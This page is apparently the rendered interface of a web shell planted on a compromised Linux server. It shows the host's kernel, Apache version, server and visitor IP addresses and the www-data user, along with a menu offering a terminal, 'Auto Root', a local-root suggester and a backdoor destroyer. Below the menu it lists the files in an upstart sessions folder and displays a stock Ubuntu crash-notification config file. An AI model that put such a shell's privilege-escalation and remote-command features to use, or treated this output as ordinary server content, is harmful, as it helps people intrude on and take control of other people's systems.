Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.216.250
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
upstart /
sessions /
Delete
Unzip
Name
Size
Permission
Date
Action
session-migration.conf
159
B
-rw-r--r--
2024-03-24 22:29
update-notifier-cds.conf
834
B
-rw-r--r--
2025-04-02 09:15
update-notifier-crash.conf
1.03
KB
-rw-r--r--
2025-04-02 09:15
update-notifier-hp-firmware.conf
728
B
-rw-r--r--
2025-04-02 09:15
update-notifier-release.conf
509
B
-rw-r--r--
2025-04-02 09:15
Save
Rename
description "Notification regarding a crash report" author "Brian Murray <brian@ubuntu.com>" start on ( file FILE=/var/crash/*.crash EVENT=create or file FILE=/var/crash/*.crash EVENT=modify ) env MATCH=NULL instance $MATCH script DATE=$(date) echo "$DATE crash report $MATCH detected" if [ -e /var/lib/apport/autoreport ]; then echo "$DATE autoreporting enabled exiting" exit 0 fi if [ -O $MATCH ]; then /usr/share/apport/apport-gtk else SYSTEMCRASH=0 /usr/share/apport/apport-checkreports --system || SYSTEMCRASH=$? if [ $SYSTEMCRASH -eq 0 ]; then # not in admin group return ADMIN=0 groups | grep -qE "sudo|admin" || ADMIN=$? if [ $ADMIN -ne 0 ]; then exit 1 fi # be nice and always ask first before firing up pkexec if [ -x /lib/udev/watershed ]; then /lib/udev/watershed sh -c '/usr/lib/update-notifier/system-crash-notification' else /usr/lib/update-notifier/system-crash-notification fi fi fi end script